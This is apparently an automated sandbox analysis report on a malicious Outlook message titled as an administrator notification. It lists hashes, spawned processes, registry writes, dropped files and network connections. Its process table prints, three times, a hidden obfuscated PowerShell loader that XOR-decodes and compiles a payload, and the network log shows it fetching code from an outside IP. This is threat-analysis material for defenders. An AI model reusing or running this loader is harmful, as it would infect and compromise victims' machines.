| File name: | Administrator Notification_ Redirecting email with malware.msg |
| Full analysis: | https://app.any.run/tasks/def0958c-2a6a-47ea-afd2-4fca58aa8422 |
| Verdict: | Malicious activity |
| Analysis date: | June 19, 2019, 15:31:59 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators: | |
| MIME: | application/vnd.ms-outlook |
| File info: | CDFV2 Microsoft Outlook Message |
| MD5: | 75B0FAC59E91E2435826D431F5F3B68C |
| SHA1: | A904EE6A4E1A2DB6E9B8A159A2DBDDF669D620FB |
| SHA256: | 89D3965A4ACD3958A014404CB4BC8F9118F39021ACE9C25FC0DCC3FEA326EFF4 |
| SSDEEP: | 3072:5ZyprkGYH4pBYNH0vdxOvdxOvdxOvdxOvdxLtxf:+dkZ7wxcxcxcxcx7 |
| .msg | | | Outlook Message (58.9) |
|---|---|---|
| .oft | | | Outlook Form Template (34.4) |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1524 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES8CE7.tmp" "c:\Users\admin\AppData\Local\Temp\CSC8CE6.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) Modules
| |||||||||||||||
| 1964 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESA021.tmp" "c:\Users\admin\AppData\Local\Temp\CSCA020.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) Modules
| |||||||||||||||
| 2304 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 2560 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\qw2fklhk.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) Modules
| |||||||||||||||
| 2680 | powershell -WindowStyle Hidden function lcf9b { param($cf2c54) $y7de4d = 'w3feddc'; $b23d93e = ''; for ($i = 0; $i -lt $cf2c54.length; $i+=2) { $rb3db7 = [convert]::ToByte($cf2c54.Substring($i, 2), 16); $b23d93e += [char]($rb3db7 -bxor $y7de4d[($i / 2) % $y7de4d.length]); } return $b23d93e; } $ufbf11a = '02400f0b0344300e401200095f6e7d46150c0a0343244a151101094d254608110d0906597a081101160c07600317120d0012405d686e11101e5d0145371d1003560b4b200d02105d0916100d0004086b6f11170a195446361d1717125e482c2b5f6e7d46150c0a0343244a151101094d3956125e696e1302510a0c0744001b521516440e5143045756696e187a3946454444435713463e20080f3e5e160a16104b555803170a010f4401444944210d03411f350b0d0d03135b454623060363140a0725071341031617464a2a3e6c45444443571346451411011b5a0545171002035a0545011c17124108452d0a17274714451000064f0103074c2d0d0363121744155b1350035648441003410f0b034412150502515d014a4c3e6c45444443571346453f200f1b7a0b150b16175f110d00160a061b0054474844261947141c340b0a1947465844462f185202290d061116411f474d396e7d1346454444435713161006080a1413151105100a1413031d10011119132f0b10341705130a030502014e1b1511160d0d1013135702005212524f5e696e43571346454444432c770a092d09131841124d460f06055d03095756415b13230b10161a275c0f0b10445e5711300c161016165f36170b10061447444c3969695713464544444357431307080d0057401204100d0057561e1101160d5751090a084416135555014c2d0d0363121744050114040553024843227a0811341011575d57535c01005b13130c0a10431c0400575d50545b1309101044161e5d12450c0251430205044d5f6e7d13464544444357133d2108082a1a430917104c413c56140b010850451d020908464f57760811161d33185a081144594355611209290b15127e03080b161a551f463601102f1640122016160c05135b4502050f04564f38696e4357134645444443044707110d0743124b1200160a43015c0f01440b01135250574c2d0d036312174417064f5604075248433e5d12351016430e0502530048431e5d12450255511502004c5f69697a3946454444435713461511060f1e5046161005171e50460c0a104301550407074c4a7a3946454444435713461e696e4357134645444443571346452d0a1727471445115d011600524559440f115200075d4c0f14555f074c4652410603545154004352565554025215114f4c5f69695713464544444357134645440d05571b135c06055043135b58442d0d036312174a3e06055c4f686e4443571346454444435713461e696e435713464544444357134645444443575409110b440240070257555f6e7d1346454444435713464544441e7a396b6f4444435713464544444357132f0b103417051310040205024f135b451000064f0103074c115a1552555148440f14555f074c465041060354515400440456525456524e045754575450470156545555415e1a5d686e4443571346454444435713460c02444b01520004055c434a0e462c0a10330341483f01160c5e3e6c454444435713464544444357486b6f4444435713464544444357134645444404184709450553571301575e696e4357134645444443571346451969697a39464544444357134645444443227a08113410115751040306525146135b454c312a19473611164d564c3e6c454444435713464544444357460f0b1044174f56575344594347086b6f4444435713464544444357130f03444c4202570056004c15165507045c4843155100075256525b13561d50544f575c131144105b1202504c4d69695713464544444357134645441f6e7d13464544444357134645444443571346020b100c575251510056524c3e6c4544444357134645444443574e6b6f444443571346454444435713241c1001382a131707015156570e461e44541b44024a45541c05111f46551c5d53574e5d686e4443571346454444435713462c0a103303414606555c074051465844290205400e04084a221b5f09062c230f185107094c574a4c3e6c4544444357134645444443577e0717170c021b1d250a141d4b06510350514843471f4606555c0740514a45574d587a394645444443571346454444431851020452564b195611452d0a172747144d12050516525e4b300b2a194750514c4d435c13561d545452151a4a4507555b1304044944574a4c3e6c686e0554435754545e69697e3a6f320106201b5a030b104400400b03540653434a130800134434125125090d010d031b4f5e696e6a7e3a1511160d0d101316015607054356465844210d015a140a0a090619474822011025185f0200163402035b4e200a120a055c0808010a1759601600070d021b75090900011159721615080d0016470f0a0a200203524f454f44412b6f10540706554611464e440800110a044d46515a420557005454415e086b6f6d6d6a14045e00550654597709120a080c1657200c08014b1b50005c064c41465552525556524206035106500043005653505c56440655510551514300570151535647065551065754420b565151525647065250505152551a4a45140051145552004d5f6e7d3a6f6c34160c1456151637100205472f0b020b430f0a525c55445e575d0312443411185003161737171641122c0a020c5f430257070257121a5d686e6d6a7e63140a070110041d35110516175f4b5f515d554a4c3e6c686e44435713464544444357134617011016055d46555f696957134645444443574e6b6f6d6d1302510a0c0744100352120c07441003410f0b03440f14555f074c1717055a0802440b00115104574d69695713464544444357486b6f6d6d6a0447140c0a0343060b02060157434a134412570206135705475f69695713464544444357134645441717055a08024408051655045c4459432447140c0a034d325e16111d5f6e7d134645444443571346454444051841464d0d0a17575a4658445458575a4659440b00115104574a28061954120d5f440a57185b45564d6e7d134645444443571346454444187a3946454444435713464544444357134645061d1712131201015c511251465844270c19450317104a3718711f11014c0c14550407564a3002511511160d0d101b0f4944564a5b1357534d5f6e7d1346454444435713464544444357134609020505150a464e59444b145b07174d4c1713565e570106432913175d00070644684e0c444b43451a464044155b135003564a28061954120d394d587a394645444443571346454444430a3e6c686e44435713464544444357134617011016055d4609020505150a5d686e44435713464544441e7a391b'; $ufbf11a2 = lcf9b($ufbf11a); Add-Type -TypeDefinition $ufbf11a2; [j24713]::vfbbc(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2820 | powershell -WindowStyle Hidden function lcf9b { param($cf2c54) $y7de4d = 'w3feddc'; $b23d93e = ''; for ($i = 0; $i -lt $cf2c54.length; $i+=2) { $rb3db7 = [convert]::ToByte($cf2c54.Substring($i, 2), 16); $b23d93e += [char]($rb3db7 -bxor $y7de4d[($i / 2) % $y7de4d.length]); } return $b23d93e; } $ufbf11a = '02400f0b0344300e401200095f6e7d46150c0a0343244a151101094d254608110d0906597a081101160c07600317120d0012405d686e11101e5d0145371d1003560b4b200d02105d0916100d0004086b6f11170a195446361d1717125e482c2b5f6e7d46150c0a0343244a151101094d3956125e696e1302510a0c0744001b521516440e5143045756696e187a3946454444435713463e20080f3e5e160a16104b555803170a010f4401444944210d03411f350b0d0d03135b454623060363140a0725071341031617464a2a3e6c45444443571346451411011b5a0545171002035a0545011c17124108452d0a17274714451000064f0103074c2d0d0363121744155b1350035648441003410f0b034412150502515d014a4c3e6c45444443571346453f200f1b7a0b150b16175f110d00160a061b0054474844261947141c340b0a1947465844462f185202290d061116411f474d396e7d1346454444435713161006080a1413151105100a1413031d10011119132f0b10341705130a030502014e1b1511160d0d1013135702005212524f5e696e43571346454444432c770a092d09131841124d460f06055d03095756415b13230b10161a275c0f0b10445e5711300c161016165f36170b10061447444c3969695713464544444357431307080d0057401204100d0057561e1101160d5751090a084416135555014c2d0d0363121744050114040553024843227a0811341011575d57535c01005b13130c0a10431c0400575d50545b1309101044161e5d12450c0251430205044d5f6e7d13464544444357133d2108082a1a430917104c413c56140b010850451d020908464f57760811161d33185a081144594355611209290b15127e03080b161a551f463601102f1640122016160c05135b4502050f04564f38696e4357134645444443044707110d0743124b1200160a43015c0f01440b01135250574c2d0d036312174417064f5604075248433e5d12351016430e0502530048431e5d12450255511502004c5f69697a3946454444435713461511060f1e5046161005171e50460c0a104301550407074c4a7a3946454444435713461e696e4357134645444443571346452d0a1727471445115d011600524559440f115200075d4c0f14555f074c4652410603545154004352565554025215114f4c5f69695713464544444357134645440d05571b135c06055043135b58442d0d036312174a3e06055c4f686e4443571346454444435713461e696e435713464544444357134645444443575409110b440240070257555f6e7d1346454444435713464544441e7a396b6f4444435713464544444357132f0b103417051310040205024f135b451000064f0103074c115a1552555148440f14555f074c465041060354515400440456525456524e045754575450470156545555415e1a5d686e4443571346454444435713460c02444b01520004055c434a0e462c0a10330341483f01160c5e3e6c454444435713464544444357486b6f4444435713464544444357134645444404184709450553571301575e696e4357134645444443571346451969697a39464544444357134645444443227a08113410115751040306525146135b454c312a19473611164d564c3e6c454444435713464544444357460f0b1044174f56575344594347086b6f4444435713464544444357130f03444c4202570056004c15165507045c4843155100075256525b13561d50544f575c131144105b1202504c4d69695713464544444357134645441f6e7d13464544444357134645444443571346020b100c575251510056524c3e6c4544444357134645444443574e6b6f444443571346454444435713241c1001382a131707015156570e461e44541b44024a45541c05111f46551c5d53574e5d686e4443571346454444435713462c0a103303414606555c074051465844290205400e04084a221b5f09062c230f185107094c574a4c3e6c4544444357134645444443577e0717170c021b1d250a141d4b06510350514843471f4606555c0740514a45574d587a394645444443571346454444431851020452564b195611452d0a172747144d12050516525e4b300b2a194750514c4d435c13561d545452151a4a4507555b1304044944574a4c3e6c686e0554435754545e69697e3a6f320106201b5a030b104400400b03540653434a130800134434125125090d010d031b4f5e696e6a7e3a1511160d0d101316015607054356465844210d015a140a0a090619474822011025185f0200163402035b4e200a120a055c0808010a1759601600070d021b75090900011159721615080d0016470f0a0a200203524f454f44412b6f10540706554611464e440800110a044d46515a420557005454415e086b6f6d6d6a14045e00550654597709120a080c1657200c08014b1b50005c064c41465552525556524206035106500043005653505c56440655510551514300570151535647065551065754420b565151525647065250505152551a4a45140051145552004d5f6e7d3a6f6c34160c1456151637100205472f0b020b430f0a525c55445e575d0312443411185003161737171641122c0a020c5f430257070257121a5d686e6d6a7e63140a070110041d35110516175f4b5f515d554a4c3e6c686e44435713464544444357134617011016055d46555f696957134645444443574e6b6f6d6d1302510a0c0744100352120c07441003410f0b03440f14555f074c1717055a0802440b00115104574d69695713464544444357486b6f6d6d6a0447140c0a0343060b02060157434a134412570206135705475f69695713464544444357134645441717055a08024408051655045c4459432447140c0a034d325e16111d5f6e7d134645444443571346454444051841464d0d0a17575a4658445458575a4659440b00115104574a28061954120d5f440a57185b45564d6e7d134645444443571346454444187a3946454444435713464544444357134645061d1712131201015c511251465844270c19450317104a3718711f11014c0c14550407564a3002511511160d0d101b0f4944564a5b1357534d5f6e7d1346454444435713464544444357134609020505150a464e59444b145b07174d4c1713565e570106432913175d00070644684e0c444b43451a464044155b135003564a28061954120d394d587a394645444443571346454444430a3e6c686e44435713464544444357134617011016055d4609020505150a5d686e44435713464544441e7a391b'; $ufbf11a2 = lcf9b($ufbf11a); Add-Type -TypeDefinition $ufbf11a2; [j24713]::vfbbc(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2836 | powershell -WindowStyle Hidden function lcf9b { param($cf2c54) $y7de4d = 'w3feddc'; $b23d93e = ''; for ($i = 0; $i -lt $cf2c54.length; $i+=2) { $rb3db7 = [convert]::ToByte($cf2c54.Substring($i, 2), 16); $b23d93e += [char]($rb3db7 -bxor $y7de4d[($i / 2) % $y7de4d.length]); } return $b23d93e; } $ufbf11a = '02400f0b0344300e401200095f6e7d46150c0a0343244a151101094d254608110d0906597a081101160c07600317120d0012405d686e11101e5d0145371d1003560b4b200d02105d0916100d0004086b6f11170a195446361d1717125e482c2b5f6e7d46150c0a0343244a151101094d3956125e696e1302510a0c0744001b521516440e5143045756696e187a3946454444435713463e20080f3e5e160a16104b555803170a010f4401444944210d03411f350b0d0d03135b454623060363140a0725071341031617464a2a3e6c45444443571346451411011b5a0545171002035a0545011c17124108452d0a17274714451000064f0103074c2d0d0363121744155b1350035648441003410f0b034412150502515d014a4c3e6c45444443571346453f200f1b7a0b150b16175f110d00160a061b0054474844261947141c340b0a1947465844462f185202290d061116411f474d396e7d1346454444435713161006080a1413151105100a1413031d10011119132f0b10341705130a030502014e1b1511160d0d1013135702005212524f5e696e43571346454444432c770a092d09131841124d460f06055d03095756415b13230b10161a275c0f0b10445e5711300c161016165f36170b10061447444c3969695713464544444357431307080d0057401204100d0057561e1101160d5751090a084416135555014c2d0d0363121744050114040553024843227a0811341011575d57535c01005b13130c0a10431c0400575d50545b1309101044161e5d12450c0251430205044d5f6e7d13464544444357133d2108082a1a430917104c413c56140b010850451d020908464f57760811161d33185a081144594355611209290b15127e03080b161a551f463601102f1640122016160c05135b4502050f04564f38696e4357134645444443044707110d0743124b1200160a43015c0f01440b01135250574c2d0d036312174417064f5604075248433e5d12351016430e0502530048431e5d12450255511502004c5f69697a3946454444435713461511060f1e5046161005171e50460c0a104301550407074c4a7a3946454444435713461e696e4357134645444443571346452d0a1727471445115d011600524559440f115200075d4c0f14555f074c4652410603545154004352565554025215114f4c5f69695713464544444357134645440d05571b135c06055043135b58442d0d036312174a3e06055c4f686e4443571346454444435713461e696e435713464544444357134645444443575409110b440240070257555f6e7d1346454444435713464544441e7a396b6f4444435713464544444357132f0b103417051310040205024f135b451000064f0103074c115a1552555148440f14555f074c465041060354515400440456525456524e045754575450470156545555415e1a5d686e4443571346454444435713460c02444b01520004055c434a0e462c0a10330341483f01160c5e3e6c454444435713464544444357486b6f4444435713464544444357134645444404184709450553571301575e696e4357134645444443571346451969697a39464544444357134645444443227a08113410115751040306525146135b454c312a19473611164d564c3e6c454444435713464544444357460f0b1044174f56575344594347086b6f4444435713464544444357130f03444c4202570056004c15165507045c4843155100075256525b13561d50544f575c131144105b1202504c4d69695713464544444357134645441f6e7d13464544444357134645444443571346020b100c575251510056524c3e6c4544444357134645444443574e6b6f444443571346454444435713241c1001382a131707015156570e461e44541b44024a45541c05111f46551c5d53574e5d686e4443571346454444435713462c0a103303414606555c074051465844290205400e04084a221b5f09062c230f185107094c574a4c3e6c4544444357134645444443577e0717170c021b1d250a141d4b06510350514843471f4606555c0740514a45574d587a394645444443571346454444431851020452564b195611452d0a172747144d12050516525e4b300b2a194750514c4d435c13561d545452151a4a4507555b1304044944574a4c3e6c686e0554435754545e69697e3a6f320106201b5a030b104400400b03540653434a130800134434125125090d010d031b4f5e696e6a7e3a1511160d0d101316015607054356465844210d015a140a0a090619474822011025185f0200163402035b4e200a120a055c0808010a1759601600070d021b75090900011159721615080d0016470f0a0a200203524f454f44412b6f10540706554611464e440800110a044d46515a420557005454415e086b6f6d6d6a14045e00550654597709120a080c1657200c08014b1b50005c064c41465552525556524206035106500043005653505c56440655510551514300570151535647065551065754420b565151525647065250505152551a4a45140051145552004d5f6e7d3a6f6c34160c1456151637100205472f0b020b430f0a525c55445e575d0312443411185003161737171641122c0a020c5f430257070257121a5d686e6d6a7e63140a070110041d35110516175f4b5f515d554a4c3e6c686e44435713464544444357134617011016055d46555f696957134645444443574e6b6f6d6d1302510a0c0744100352120c07441003410f0b03440f14555f074c1717055a0802440b00115104574d69695713464544444357486b6f6d6d6a0447140c0a0343060b02060157434a134412570206135705475f69695713464544444357134645441717055a08024408051655045c4459432447140c0a034d325e16111d5f6e7d134645444443571346454444051841464d0d0a17575a4658445458575a4659440b00115104574a28061954120d5f440a57185b45564d6e7d134645444443571346454444187a3946454444435713464544444357134645061d1712131201015c511251465844270c19450317104a3718711f11014c0c14550407564a3002511511160d0d101b0f4944564a5b1357534d5f6e7d1346454444435713464544444357134609020505150a464e59444b145b07174d4c1713565e570106432913175d00070644684e0c444b43451a464044155b135003564a28061954120d394d587a394645444443571346454444430a3e6c686e44435713464544444357134617011016055d4609020505150a5d686e44435713464544441e7a391b'; $ufbf11a2 = lcf9b($ufbf11a); Add-Type -TypeDefinition $ufbf11a2; [j24713]::vfbbc(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2948 | "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\Administrator Notification_ Redirecting email with malware.msg" | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Outlook Exit code: 0 Version: 14.0.6025.1000 Modules
| |||||||||||||||
| 3068 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 3116 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES9C39.tmp" "c:\Users\admin\AppData\Local\Temp\CSC9C38.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) Modules
| |||||||||||||||
| (PID) Process: | (2948) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (2948) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (2948) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Resiliency\StartupItems |
| Operation: | write | Name: | >"= |
Value: 3E223D00840B0000010000000000000000000000 | |||
| (PID) Process: | (2948) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook |
| Operation: | write | Name: | MTTT |
Value: 840B0000C6F4202CB426D50100000000 | |||
| (PID) Process: | (2948) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\SQM |
| Operation: | write | Name: | SQMSessionNumber |
Value: 0 | |||
| (PID) Process: | (2948) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\SQM |
| Operation: | write | Name: | SQMSessionDate |
Value: 220089600 | |||
| (PID) Process: | (2948) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NoMail\0a0d020000000000c000000000000046 |
| Operation: | write | Name: | 00030429 |
Value: 03000000 | |||
| (PID) Process: | (2948) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NoMail\9375CFF0413111d3B88A00104B2A6676 |
| Operation: | write | Name: | {ED475418-B0D6-11D2-8C3B-00104B2A6676} |
Value: | |||
| (PID) Process: | (2948) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NoMail\9375CFF0413111d3B88A00104B2A6676 |
| Operation: | write | Name: | LastChangeVer |
Value: 1200000000000000 | |||
| (PID) Process: | (2948) OUTLOOK.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109A10090400000000000F01FEC\Usage |
| Operation: | write | Name: | OutlookMAPI2Intl_1033 |
Value: 1322450965 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2948 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVRE9E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2948 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\~DF635BBA4453D1BDE6.TMP | — | |
MD5:— | SHA256:— | |||
| 2948 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\4POXEV8Y\7050026 (2).DOC\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
| 3272 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR5BF3.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3272 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_C5CF5ED4-73DB-472F-B1AF-1082605C73A0.0\3B825577.DOC\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
| 3816 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR7F98.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3888 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR863F.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2680 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0QRLWJPMGBK8FXBN82RF.temp | — | |
MD5:— | SHA256:— | |||
| 2948 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | pgc | |
MD5:— | SHA256:— | |||
| 2948 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\4POXEV8Y\7050026.DOC | text | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2948 | OUTLOOK.EXE | GET | — | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | — | — | whitelisted |
2680 | powershell.exe | GET | — | 45.67.14.157:80 | http://45.67.14.157/T/705002 | unknown | — | — | suspicious |
2680 | powershell.exe | GET | — | 45.67.14.157:80 | http://45.67.14.157/T/705002 | unknown | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2948 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
2680 | powershell.exe | 45.67.14.157:80 | — | — | — | suspicious |
Domain | IP | Reputation |
|---|---|---|
config.messenger.msn.com |
| whitelisted |
dns.msftncsi.com |
| shared |
Process | Message |
|---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|